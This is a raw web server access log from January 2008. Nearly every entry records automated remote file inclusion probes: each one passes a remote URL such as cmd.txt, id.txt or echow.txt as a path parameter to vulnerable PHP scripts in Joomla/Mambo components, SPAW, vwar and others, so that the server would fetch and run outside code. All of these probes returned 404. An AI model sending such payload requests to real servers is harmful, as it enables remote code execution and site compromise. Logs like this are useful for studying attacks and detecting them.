208.116.37.218 - - [25/Jan/2008:16:46:27 -0800] "GET /logs/access_071225.log//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.37.218 - - [25/Jan/2008:16:46:27 -0800] "GET //index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.37.218 - - [25/Jan/2008:16:46:27 -0800] "GET /logs//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.37.218 - - [25/Jan/2008:16:47:21 -0800] "GET /logs/access_071216.log//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:47:35 -0800] "GET /logs/access_071222.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:47:36 -0800] "GET /logs/access_071222.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:47:37 -0800] "GET /logs/access_071222.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:47:40 -0800] "GET /logs/access_071222.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:16:47:42 -0800] "GET /logs/access_071222.log//index.php?sub=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.137.58.80 - - [25/Jan/2008:16:47:53 -0800] "GET /logs/access_071225.log//error.php?dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.137.58.80 - - [25/Jan/2008:16:47:53 -0800] "GET //error.php?dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.137.58.80 - - [25/Jan/2008:16:47:54 -0800] "GET /logs//error.php?dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:16:47:59 -0800] "GET /logs/access_071228.log//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:16:47:59 -0800] "GET //index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:16:48:00 -0800] "GET /logs//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:16:48:08 -0800] "GET /logs/access_071230.log//bemarket/postscript/postscript.php?p_mode=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:16:48:08 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.137.58.80 - - [25/Jan/2008:16:50:01 -0800] "GET /logs/access.log//error.php?dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.206.50 - - [25/Jan/2008:16:52:09 -0800] "GET /logs/access_071225.log//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [25/Jan/2008:16:52:10 -0800] "GET //index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [25/Jan/2008:16:52:10 -0800] "GET /logs//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [25/Jan/2008:16:55:27 -0800] "GET /logs/access_071216.log//index.php?subpage=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:55:39 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:55:39 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:55:39 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:16:57:27 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:16:57:28 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:16:57:28 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:16:57:33 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:16:57:33 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:16:57:33 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:16:57:47 -0800] "GET /logs/access_071229.log/s.php?table=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:16:57:47 -0800] "GET /s.php?table=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:16:57:48 -0800] "GET /logs/s.php?table=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:57:57 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:57:57 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:57:57 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:57:57 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:57:58 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:57:58 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:58:51 -0800] "GET /logs/access.log//config.php?path_to_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:58:51 -0800] "GET //config.php?path_to_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:16:58:52 -0800] "GET /logs//config.php?path_to_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
66.61.61.108 - - [25/Jan/2008:16:59:55 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 200 23376 "http://www.st-owners.com/forums/showthread.php?t=34378" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:01:36 -0800] "GET /logs/access_071228.log//config.php?path_to_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
67.195.44.94 - - [25/Jan/2008:17:02:56 -0800] "GET /logs/access.log HTTP/1.0" 200 458114 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:03:03 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:03:07 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:03:07 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:03:08 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.37.218 - - [25/Jan/2008:17:04:55 -0800] "GET /logs/access_071228.log//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.37.218 - - [25/Jan/2008:17:04:55 -0800] "GET //index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.37.218 - - [25/Jan/2008:17:04:55 -0800] "GET /logs//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:17:08:10 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:17:08:11 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:17:08:11 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:17:09:51 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:17:09:51 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:10:20 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:10:21 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:10:21 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:17:10:31 -0800] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:17:13:56 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:17:13:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://calendar.kansasspeech.org/events/includes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.200.79.215 - - [25/Jan/2008:17:14:28 -0800] "GET /logs/access_071222.log//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [25/Jan/2008:17:14:34 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [25/Jan/2008:17:14:34 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [25/Jan/2008:17:14:35 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.206.50 - - [25/Jan/2008:17:14:36 -0800] "GET /logs/access_071228.log//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [25/Jan/2008:17:14:36 -0800] "GET //index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [25/Jan/2008:17:14:37 -0800] "GET /logs//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:17:15:28 -0800] "GET /logs/access_071229.log//login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:17:15:29 -0800] "GET //login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:17:15:29 -0800] "GET /logs//login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:17:16:16 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:17:16:16 -0800] "GET //login.php?dir=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.98.139.142 - - [25/Jan/2008:17:16:16 -0800] "GET /logs//login.php?dir=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:17:19 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
203.151.233.24 - - [25/Jan/2008:17:17:23 -0800] "GET /logs/access.log//login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:17:23 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:18:12 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:18:12 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:18:13 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:18:42 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:18:42 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:18:43 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:18:43 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:18:43 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:18:43 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:17:22:05 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:23:48 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
217.10.138.236 - - [25/Jan/2008:17:23:48 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:17:24:22 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.pcbcservice.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:17:24:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.pcbcservice.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:17:24:23 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.pcbcservice.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:17:24:45 -0800] "GET /logs/access_071221.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:17:24:46 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:17:24:46 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:17:24:49 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:17:24:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [25/Jan/2008:17:24:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:17:25:37 -0800] "GET /logs/access_071229.log//login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:17:25:37 -0800] "GET //login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:17:25:37 -0800] "GET /logs//login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.37.218 - - [25/Jan/2008:17:28:34 -0800] "GET /logs/access_071222.log//index.php?sub=http://www.laila.jp/item_pics/d3rf/teste.txt???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:28:52 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:28:52 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:28:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:28:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:28:52 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
24.21.221.49 - - [25/Jan/2008:17:28:52 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [25/Jan/2008:17:29:01 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:29:04 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:29:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:29:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:29:08 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:29:08 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.140.18.219 - - [25/Jan/2008:17:29:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://szom.bravehost.com/sample.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:17:29:34 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:17:30:46 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:17:30:46 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.161 - - [25/Jan/2008:17:30:52 -0800] "GET /logs/access.log//login.php?dir=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
